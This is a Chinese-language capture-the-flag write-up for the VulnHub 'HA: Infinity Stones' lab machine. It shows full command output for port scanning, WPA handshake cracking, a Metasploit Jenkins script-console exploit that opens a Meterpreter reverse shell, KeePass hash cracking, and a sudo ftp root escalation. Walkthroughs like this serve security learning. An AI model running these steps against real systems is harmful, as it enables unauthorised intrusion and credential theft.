• HA: Infinity Stones-Write-up



    • 主题还是关于复仇者联盟的,这次是无限宝石的。

    信息收集

    • 虚拟机的IP为:192.168.116.137
    ➜  ~ nmap -sn 192.168.116.1/24      
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 19:53 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.0019s latency).
    Nmap scan report for 192.168.116.137
    Host is up (0.00076s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.55 seconds
    ➜  ~ nmap -A -T4 192.168.116.137 -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 20:09 CST
    Nmap scan report for 192.168.116.137
    Host is up (0.0091s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE  VERSION
    22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
    |   256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
    |_  256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
    80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA:Infinity Stones
    443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA:Infinity Stones
    | ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
    | Not valid before: 2019-09-15T17:18:57
    |_Not valid after:  2020-09-14T17:18:57
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    8080/tcp open  http     Jetty 9.4.z-SNAPSHOT
    | http-robots.txt: 1 disallowed entry 
    |_/
    |_http-server-header: Jetty(9.4.z-SNAPSHOT)
    |_http-title: Site doesn't have a title (text/html;charset=utf-8).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
    ➜  ~
    
    • SHH和3个Web服务:
    • 80端口:主页显示的是六颗宝石的图片,还有一个答题的页面。
    • 443端口:Nmap输出的证书一看就不正常,这么长。
    • 第一颗宝石到手,MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
    • 8080端口:跳转到了Jenkins的登录页面。
    • 先扫80端口的目录
    ➜  ~ dirb http://192.168.116.137   
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Mon Sep 23 20:32:09 2019
    URL_BASE: http://192.168.116.137/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.137/ ----
    ==> DIRECTORY: http://192.168.116.137/images/                                                                                                                                                                                                 
    ==> DIRECTORY: http://192.168.116.137/img/                                                                                                                                                                                                    
    + http://192.168.116.137/index.html (CODE:200|SIZE:3261)                                                                                                                                                                                      
    + http://192.168.116.137/server-status (CODE:403|SIZE:280)                                                                                                                                                                                    
    ==> DIRECTORY: http://192.168.116.137/wifi/                                                                                                                                                                                                   
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/img/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/wifi/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Mon Sep 23 20:32:12 2019
    DOWNLOADED: 4612 - FOUND: 2
    ➜  ~
    
    • 发现有三个目录
    http://192.168.116.137/wifi/
    http://192.168.116.137/img/
    http://192.168.116.137/images/
    

    破解WiFi密码

    • 在wifi这个目录下,有一个pwn.txt,里面好像是密码的规则;还有一个数据包,前面的密码应该是用来解这个数据包的。
    ➜  ~ curl "http://192.168.116.137/wifi/pwd.txt"    
    Your Password is thanos daughter name   "gam" (note it's all lower case) plus the following
    I enforced new password requirement on you ... 12 characters
    
    One uppercase charracter
    Two Numbers
    Two Lowercase
    The Year of first avengers came out in threatre
    ➜  ~
    
    • 密码提示为以gam都是小写开头,再加上一个大写字母,两个数字,两个小写字母,复仇者联盟第一次上映的年份。就像:gamA12bc2012,一共是12位密码。
    • crunch走起:
    %      代表数字
    ^      代表特殊符号
    @      代表小写字母
    ,      代表大写字符
    ---
    ➜  VulnHub crunch 12 12 -t gam,%%@@2012 -o dict.txt
    Crunch will now generate the following amount of data: 22848800 bytes
    21 MB
    0 GB
    0 TB
    0 PB
    Crunch will now generate the following number of lines: 1757600 
    
    crunch: 100% completed generating output
    ➜  VulnHub
    
    • 破解WiFi密码,kali入门操作。
    ➜  VulnHub aircrack-ng reality.cap -w dict.txt 
    Opening reality.capease wait...
    Read 4848 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  38:D5:47:42:EE:A0  Kavish_2.4Ghz             WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening reality.capease wait...
    Read 4848 packets.
    
    1 potential targets
    Aircrack-ng 1.5.2 
    
          [00:00:56] 128345/1757592 keys tested (2277.47 k/s) 
    
          Time left: 11 minutes, 55 seconds                          7.30%
    
                             KEY FOUND! [ gamA00fe2012 ]
    
    
          Master Key     : 90 EC 8F B0 CC E3 C5 0E EE AC AD 05 0B A9 08 47 
                           FD 4D 3E 55 60 7D B3 B0 92 21 FB 06 BA 96 53 90 
    
          Transient Key  : 66 85 68 5E A3 0C BD 5E 6E 3D ED 66 DC 07 76 9F 
                           08 5B CD E3 58 56 D6 AB 18 5C CC 75 7C 1D A3 E7 
                           87 BE 75 0F 24 EA 12 AC C5 EE 56 34 4C B5 3A 40 
                           73 77 F2 F3 D0 C7 DC E5 ED 5A A0 83 87 37 94 31 
    
          EAPOL HMAC     : AB 9A 17 CA 09 25 69 2B 71 06 76 EA F8 FE 23 67 
    ➜  VulnHub
    
    • 密码为:gamA00fe2012,然后可以用WireShark把数据包里的内容看一下。一开始还以为Flag在数据包了,因为以前有遇到这种情况。既然写到了这里就顺便写一下怎么解加密的WiFi的pcap包,所以大家不要去连接一些陌生的WiFi热点。
    ➜  VulnHub airdecap-ng -e Kavish_2.4Ghz -p gamA00fe2012 reality.cap 
    Total number of stations seen            5
    Total number of packets read          4848
    Total number of WEP data packets         0
    Total number of WPA data packets       245
    Number of plaintext data packets         0
    Number of decrypted WEP  packets         0
    Number of corrupted WEP  packets         0
    Number of decrypted WPA  packets       136
    Number of bad TKIP (WPA) packets         0
    Number of bad CCMP (WPA) packets         0
    
    • 解完默认在目录下生成一个reality-dec.cap文件,直接用WireShark打开就可以看到里面的数据了,开不开心,惊不惊讶,一般人我不告诉他。
    • 或者用WireShark在首选项里的协议里IEEE802.11加上WiFi的密码。
    • 但搞了这么久,发现Flag并不是在数据包了,真是日了狗了。其实在密码作为URL的路径,里面有一个文件存着Flag。
    ➜  VulnHub curl "http://192.168.116.137/gamA00fe2012/realitystone.txt"
    REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
    ➜  VulnHub
    
    • 第二课宝石拿到手:REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

    小考试

    • 第二条线索,Computers tells us Binary is the path to Reality.,答题页面的提示。就是一个小考试,对的为1,错的为0,一共8道题,8位数字作为URL的路径。这里直接爆破好了,反正也不会英语。
    ➜  VulnHub dirb http://192.168.116.137 01.txt 
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Tue Sep 24 00:16:29 2019
    URL_BASE: http://192.168.116.137/
    WORDLIST_FILES: 01.txt
    
    -----------------
    
    GENERATED WORDS: 256                                                           
    
    ---- Scanning URL: http://192.168.116.137/ ----
    ==> DIRECTORY: http://192.168.116.137/01101001/                                                                                                                                                                                               
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/01101001/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Tue Sep 24 00:16:29 2019
    DOWNLOADED: 256 - FOUND: 0
    ➜  VulnHub 
    ➜  VulnHub curl "http://192.168.116.137/01101001/hints.txt"           
    +++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
    +++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
    ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
    +++<] >++++ .+.<
    ➜  VulnHub
    
    • 上面的奇怪的字符简称BF,全称不好写在博客。在线解解密得admin:avengers,像基本认证的账号和密码,先放一边。

    Exif信息

    • 上面扫到的img目录,只有一张图片,exiftool读exif信息发现了Flag。
    ➜  VulnHub wget http://192.168.116.137/img/space.jpg                                       
    --2019-09-24 00:22:01--  http://192.168.116.137/img/space.jpg
    正在连接 192.168.116.137:80... 已连接。
    已发出 HTTP 请求,正在等待回应... 200 OK
    长度:17002 (17K) [image/jpeg]
    正在保存至: “space.jpg”
    
    space.jpg                                                   100%[==========================================================================================================================================>]  16.60K  --.-KB/s  用时 0s      
    
    2019-09-24 00:22:01 (98.5 MB/s) - 已保存 “space.jpg” [17002/17002])
    
    ➜  VulnHub exiftool space.jpg 
    ExifTool Version Number         : 11.50
    File Name                       : space.jpg
    Directory                       : .
    File Size                       : 17 kB
    File Modification Date/Time     : 2019:09:13 13:35:30+08:00
    File Access Date/Time           : 2019:09:24 00:22:01+08:00
    File Inode Change Date/Time     : 2019:09:24 00:22:01+08:00
    File Permissions                : rw-r--r--
    File Type                       : JPEG
    File Type Extension             : jpg
    MIME Type                       : image/jpeg
    JFIF Version                    : 1.01
    Resolution Unit                 : None
    X Resolution                    : 1
    Y Resolution                    : 1
    Comment                         : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
    Image Width                     : 768
    Image Height                    : 432
    Encoding Process                : Baseline DCT, Huffman coding
    Bits Per Sample                 : 8
    Color Components                : 3
    Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
    Image Size                      : 768x432
    Megapixels                      : 0.332
    ➜  VulnHub
    
    • 第三颗宝石到手:SPACESTONE:{74E57403424607145B9B77809DEB49D0}

    Jenkins

    • 上面找到了一组账号密码admin:avengers,尝试登录http://192.168.116.137:8080/login?from=%2F,一个Jenkins管理后台,密码正确,先丢链接https://github.com/gquere/pwn_jenkins。刚好8天前出了一个git client的RCE,还想试试来着,打开插件管理看到版本是2.8.6,git plugin存在漏洞的在<3.12.0版本内,但是安装版本为3.12.1,MSF里有利用脚本,真香。
    msf5 exploit(multi/http/jenkins_script_console) > show options 
    
    Module options (exploit/multi/http/jenkins_script_console):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       API_TOKEN                   no        The API token for the specified username
       PASSWORD   avengers         no        The password for the specified username
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS     192.168.116.137  yes       The target address range or CIDR identifier
       RPORT      8080             yes       The target port (TCP)
       SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT    8080             yes       The local port to listen on.
       SSL        false            no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
       TARGETURI  /                yes       The path to the Jenkins-CI application
       URIPATH                     no        The URI to use for this exploit (default is random)
       USERNAME   admin            no        The username to authenticate as
       VHOST                       no        HTTP server virtual host
    
    
    Exploit target:
    
       Id  Name
       --  ----
       1   Linux
    
    
    msf5 exploit(multi/http/jenkins_script_console) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Checking access to the script console
    [*] Logging in...
    [*] Using CSRF token: '8c428c023cf3d9b8ad5a0b5ec036aff8' (Jenkins-Crumb style)
    [*] 192.168.116.137:8080 - Sending Linux stager...
    [*] Sending stage (985320 bytes) to 192.168.116.137
    [*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.137:36498) at 2019-09-24 15:30:27 +0800
    
    meterpreter >
    
    • 转交互式终端:python3 -c 'import pty;pty.spawn("/bin/bash")',环境变量了没有python的路径,但有3的。
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    jenkins@ubuntu:/home/morag$ find / -perm -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    /bin/umount
    /bin/su
    /bin/mount
    /bin/fusermount
    /bin/ping
    /bin/ntfs-3g
    /opt/script
    /usr/bin/chfn
    /usr/bin/pkexec
    /usr/bin/gpasswd
    /usr/bin/arping
    /usr/bin/chsh
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/bin/vmware-user-suid-wrapper
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/sbin/pppd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/xorg/Xorg.wrap
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /snap/core18/1144/bin/mount
    /snap/core18/1144/bin/ping
    /snap/core18/1144/bin/su
    /snap/core18/1144/bin/umount
    /snap/core18/1144/usr/bin/chfn
    /snap/core18/1144/usr/bin/chsh
    /snap/core18/1144/usr/bin/gpasswd
    /snap/core18/1144/usr/bin/newgrp
    /snap/core18/1144/usr/bin/passwd
    /snap/core18/1144/usr/bin/sudo
    /snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core18/1144/usr/lib/openssh/ssh-keysign
    /snap/core/7713/bin/mount
    /snap/core/7713/bin/ping
    /snap/core/7713/bin/ping6
    /snap/core/7713/bin/su
    /snap/core/7713/bin/umount
    /snap/core/7713/usr/bin/chfn
    /snap/core/7713/usr/bin/chsh
    /snap/core/7713/usr/bin/gpasswd
    /snap/core/7713/usr/bin/newgrp
    /snap/core/7713/usr/bin/passwd
    /snap/core/7713/usr/bin/sudo
    /snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/7713/usr/lib/openssh/ssh-keysign
    /snap/core/7713/usr/lib/snapd/snap-confine
    /snap/core/7713/usr/sbin/pppd
    /snap/core/6350/bin/mount
    /snap/core/6350/bin/ping
    /snap/core/6350/bin/ping6
    /snap/core/6350/bin/su
    /snap/core/6350/bin/umount
    /snap/core/6350/usr/bin/chfn
    /snap/core/6350/usr/bin/chsh
    /snap/core/6350/usr/bin/gpasswd
    /snap/core/6350/usr/bin/newgrp
    /snap/core/6350/usr/bin/passwd
    /snap/core/6350/usr/bin/sudo
    /snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/6350/usr/lib/openssh/ssh-keysign
    /snap/core/6350/usr/lib/snapd/snap-confine
    /snap/core/6350/usr/sbin/pppd
    jenkins@ubuntu:/home/morag$
    
    • 找到/opt/script,执行
    jenkins@ubuntu:/home/morag$ cd /opt
    cd /opt
    jenkins@ubuntu:/opt$ ls
    ls
    morag.kdbx  script
    jenkins@ubuntu:/opt$ ./script
    ./script
    TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$
    
    • 第四颗宝石:TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}j

    KeePass破解

    • 还发现一个kdbx后缀的文件morag是一个用户名。
    TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$ file morag.kdbx
    file morag.kdbx
    morag.kdbx: Keepass password database 2.x KDBX
    jenkins@ubuntu:/opt$
    
    • Keepass password database 2.x KDBX,下载回来keepass2john转Hash再用John破解。
    ➜  VulnHub keepass2john morag.kdbx 
    morag:$keepass$*2*60000*0*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0
    ➜  VulnHub keepass2john morag.kdbx >keepass.hash
    ➜  VulnHub john keepass.hash 
    Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
    Use the "--format=KeePass-opencl" option to force loading these as that type instead
    Using default input encoding: UTF-8
    Loaded 1 password hash (KeePass [SHA256 AES 32/64])
    Cost 1 (iteration count) is 60000 for all loaded hashes
    Cost 2 (version) is 2 for all loaded hashes
    Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
    Will run 4 OpenMP threads
    Proceeding with single, rules:Single
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
    Almost done: Processing the remaining buffered candidate passwords, if any.
    Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
    princesa         (morag)
    1g 0:00:00:13 DONE 2/3 (2019-09-24 16:03) 0.07283g/s 209.9p/s 209.9c/s 209.9C/s pretty..fuckyou1
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    ➜  VulnHub john keepass.hash --show
    morag:princesa
    
    1 password hash cracked, 0 left
    
    • 账号密码为:morag:princesa,因为在home目录看到有morag这个用户名,所以应该可以用上。先用KeePass打开morag.kdbx文件,输入密码,可以复制密码到剪切板。An98XArsp1Ncj0hAZLda,发现密码不对但是备注了还有一段文字,盲猜base64,解码得到:morag:yondu,所以密码为yondu。Jenkins切换用户成功,也可以登录ssh服务。
    jenkins@ubuntu:/opt$ su morag
    su morag
    Password: yondu
    
    morag@ubuntu:/opt$ ls
    morag@ubuntu:~$ sudo -l
    sudo -l
    Matching Defaults entries for morag on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User morag may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/ftp
    morag@ubuntu:~$ 
    ftp> help
    help
    Commands may be abbreviated.  Commands are:
    
    !		dir		mdelete		qc		site
    $		disconnect	mdir		sendport	size
    account		exit		mget		put		status
    append		form		mkdir		pwd		struct
    ascii		get		mls		quit		system
    bell		glob		mode		quote		sunique
    binary		hash		modtime		recv		tenex
    bye		help		mput		reget		tick
    case		idle		newer		rstatus		trace
    cd		image		nmap		rhelp		type
    cdup		ipany		nlist		rename		user
    chmod		ipv4		ntrans		reset		umask
    close		ipv6		open		restart		verbose
    cr		lcd		prompt		rmdir		?
    delete		ls		passive		runique
    debug		macdef		proxy		send
    ftp> !/bin/bash
    !/bin/bash
    root@ubuntu:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~# 
    root@ubuntu:/root# ls
    ls
    final.txt
    root@ubuntu:/root# cat final.txt
    cat final.txt
    ┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬  ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐  ┬ ┬┌─┐┬ ┬  ┌─┐┌─┐┬ ┬┌┐┌┌┬┐  ┌┬┐┬ ┬┌─┐  ┌─┐┬┌┐┌┌─┐┬    ┌─┐┬  ┌─┐┌─┐  ┬┬
    ││║  │ │││││ ┬├┬┘├─┤ │ │ ││  ├─┤ │ ││ ││││└─┐  └┬┘│ ││ │  ├┤ │ ││ ││││ ││   │ ├─┤├┤   ├┤ ││││├─┤│    ├┤ │  ├─┤│ ┬  ││
    oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘   ┴ └─┘└─┘  └  └─┘└─┘┘└┘─┴┘   ┴ ┴ ┴└─┘  └  ┴┘└┘┴ ┴┴─┘  └  ┴─┘┴ ┴└─┘  oo
    
                                ,g@@@@@@g,
                               @@@@NMMN@@@g,gggpg,
                              ]@@@`    "@@@@@@@@@@@@  ,,,,
                              ]@@@      $@@@"   "%@@@@@@@@@@g
                              ]@@@      $@@@     ]@@@@M*"*%@@@g@@@@@@g
                              ]@@@      $@@@     ]@@@L     ]@@@@@NN@@@@g
                              ]@@@      $@@@     ]@@@`     ]@@@'    ]@@@L
                              ]@@@ggg   $@@@     ]@@@`     ]@@@      $@@P
                              ]@@@@@@L  $@@@@@@  ]@@@L     ]@@@      $@@P
                              ]@@@@@  1 "%@@@@F  '%@@@@@W  $@@@,,,   $@@P
                              ]@@@@@,    $@@@L  2  ]@@@M   '%@@@@@  ]@@@@,
                          ,,,,]@@@@@@@g@@@@@@@,   ,@@@@  3  $@@@'   '%@@@
                      ,g@@@@@@@@@@"%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4  ]@@@F
                     g@@@M*"""%@@@          '"MMMMM'"%@@@@@@@@@@@@g,,g@@@M
                    j@@@F     ]@@@                     "****' "%@@@@@@@@P
                    ]@@@L     ]@@@              ,ggggg,          ''"}$@@P
                    ]@@@L  g@@@@@@            g@@@@@@@@@g      j@@@  $@@P
                    ]@@@L  %NN@@@@           $@@@C   ]@@@@     ]@@@L $@@P
                    ]@@@L     '%M"          j@@@F  6  ]@@@     ]@@@L $@@P
                    ]@@@L                   '@@@@     $@@@     ]@@@L $@@P
                    ]@@@gg@@@@w              ]@@@@ggg@@@@L     ]@@@L]@@@L
                     %@@@@@@NM"               '%@@@@@@@M`     ;@@@M j@@@L
                     ]@@@@     ,@@g               ''`        #@@@M )@@@M
                     ]@@@L  5  $@@@                          `**`,@@@@F
                      ]@@@Wggg@@@@F                           ,g@@@@@`
                       "%@@@@@@@@@@@@@@@g                  ,@@@@@@@@@
                           '""*%N@@@@@@@M                   *MF" '$@@@
                                @@@@                          gg, j@@@,
                               $@@@`                         j@@@L %@@@
                              .@@@@                           %@@@ ]@@@
    
    
    
    			SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}    
    
    
    -----------Contact Undersigned to share your feedback with HACKING ARTICLES Teams-------------
    
    AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
    
    Kavish Tyagi: Tyagi_kavish_ Twitter
    
    • 第五颗宝石到手:SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
    • 还有一颗在KeePass的Flag标签里POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}
    • 六颗都集完了,打个响指吧。
  • 相关阅读:
    codevs1127
    codevs1041
    C#预处理指令
    C#基本语句与C++区别
    iOS.TextKit.01.凸版印刷效果
    iOS.常用设计模式.02.委托模式
    iOS.常用设计模式.01.单例模式
    iOS.iPad.03.UIModal
    iOS.iPad.02.UIPopoverViewController
    iOS.iPad.01.UISplitViewController
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12212382.html
Copyright © 2020-2023  润新知